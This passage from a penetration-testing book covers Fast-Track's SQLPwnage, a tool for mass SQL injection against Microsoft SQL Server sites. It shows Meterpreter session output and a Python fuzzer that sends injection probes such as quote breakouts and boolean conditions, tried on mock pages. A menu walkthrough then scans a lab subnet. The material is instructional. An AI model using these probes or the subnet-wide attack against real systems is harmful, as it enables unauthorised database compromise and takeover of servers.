172
Chapter 11
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)
meterpreter >
You should now have full access to the machine using the Meterpreter payload.
SQLPwnage
SQLPwnage is a mass brute-force attack against web applications that hunts for SQL injection in Microsoft SQL Server back ends. It scans subnets for web servers on port 80, crawls the sites it finds, and fuzzes POST parameters until it discovers an injection point. It supports both error-based and blind SQL injection and handles the rest of the attack chain for you: privilege escalation, re-enabling the xp_cmdshell stored procedure, bypassing the 64KB file-size restriction of the Windows debug.exe utility that it uses to write the payload to disk, and dropping any payload you want onto the system.
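The detection half of what SQLPwnage does, fuzz each POST parameter with a probe and decide from the response whether the back end is injectable, reduced to its logic as an added example. This is not Fast-Track or SQLPwnage code: the two web handlers are constructed in-memory stand-ins for a verbose ASP login page and a product page that swallows errors, the probe list and all function names are my own, and only the SQL Server error fragments matched by the regex are real messages a leaking page would show.

```python
"""Added example, not Fast-Track or SQLPwnage code: a minimal model of the
POST-parameter fuzzing the text describes. Both web handlers below are
constructed stand-ins, not real sites."""
import re
from typing import Callable, Dict, List

# Error fragments that a verbose ASP/ASP.NET page with a SQL Server back end leaks.
MSSQL_ERROR_SIGNATURES = [
    r"Unclosed quotation mark (?:after|before) the character string",
    r"Incorrect syntax near",
    r"Microsoft OLE DB Provider for SQL Server",
    r"ODBC SQL Server Driver",
    r"\[SQL Server\]",
]
_MSSQL_ERROR_RE = re.compile("|".join(MSSQL_ERROR_SIGNATURES), re.IGNORECASE)

# Probes appended to a parameter value to break out of a quoted string literal.
ERROR_PROBES = ["'", "\"", "')", "' OR 'a'='a"]

Handler = Callable[[Dict[str, str]], str]  # models "POST these params, get a body"


def looks_like_mssql_error(body: str) -> bool:
    """True when the response body carries a known SQL Server error fragment."""
    return _MSSQL_ERROR_RE.search(body) is not None


def fuzz_error_based(handler: Handler, base_params: Dict[str, str]) -> List[str]:
    """Mutate one parameter at a time; report those whose probe surfaces a DB error."""
    hits: List[str] = []
    if looks_like_mssql_error(handler(dict(base_params))):
        return hits  # the page errors even unmodified, so error matching proves nothing
    for name, value in base_params.items():
        for probe in ERROR_PROBES:
            mutated = dict(base_params, **{name: value + probe})
            if looks_like_mssql_error(handler(mutated)):
                hits.append(name)
                break  # one confirming probe per parameter is enough
    return hits


def fuzz_blind_boolean(handler: Handler, base_params: Dict[str, str]) -> List[str]:
    """Boolean blind check: a true condition must leave the page unchanged and a
    false one must change it; a parameter the query ignores fails the second test."""
    hits: List[str] = []
    baseline = handler(dict(base_params))
    for name, value in base_params.items():
        body_true = handler(dict(base_params, **{name: value + " AND 1=1"}))
        body_false = handler(dict(base_params, **{name: value + " AND 1=2"}))
        if body_true == baseline and body_false != baseline:
            hits.append(name)
    return hits


# --- constructed targets (hypothetical, for the example only) ----------------

def mock_login_page(params: Dict[str, str]) -> str:
    """Constructed verbose login page: concatenates two fields into T-SQL and
    echoes the provider error. The 'remember' field never reaches the query."""
    query = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (
        params.get("username", ""), params.get("password", ""))
    # Crude stand-in for the T-SQL parser: an unbalanced quote is a syntax error.
    if query.count("'") % 2:
        return ("Microsoft OLE DB Provider for SQL Server error '80040e14'\n"
                "Unclosed quotation mark after the character string ''.")
    return "<h1>Login failed</h1>"


def mock_product_page(params: Dict[str, str]) -> str:
    """Constructed product page: numeric id in a WHERE clause, all errors
    swallowed, so only a blind technique can detect the injection."""
    m = re.fullmatch(r"(\d+)(?: AND (\d+)=(\d+))?", params.get("id", ""))
    if not m:
        return "<p>Product not found</p>"  # syntax error hidden behind a generic page
    pid, lhs, rhs = m.groups()
    if pid == "7" and (lhs is None or lhs == rhs):
        return "<h1>Widget</h1>"
    return "<p>Product not found</p>"


if __name__ == "__main__":
    print(fuzz_error_based(mock_login_page, {"username": "admin", "password": "x", "remember": "1"}))
    print(fuzz_blind_boolean(mock_product_page, {"id": "7", "sort": "asc"}))
```

The two checks are deliberately separate: the error-based pass is fast and cheap but only works when the application echoes database errors, while the boolean pass costs two requests per parameter and needs a stable baseline response. A real crawler feeds each discovered form's fields into both passes; a parameter that the query never touches fails both, which is what keeps the noise down.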
Begin the configuration for this attack by selecting Microsoft SQL Tools from the Fast-Track main menu, followed by SQLPwnage, option 2, as shown below.
SQLPwnage Main Menu:
1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation
Enter your choice:
2
. . . SNIP . . .
Scan a subnet or spider single URL?
1. url
2. subnet (new)
3. subnet (lists last scan)
Enter the Number:
2
Enter the ip range, example 192.168.1.1-254:
10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all??
1. Single Website
2. All Websites
Enter the Number:
2
Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0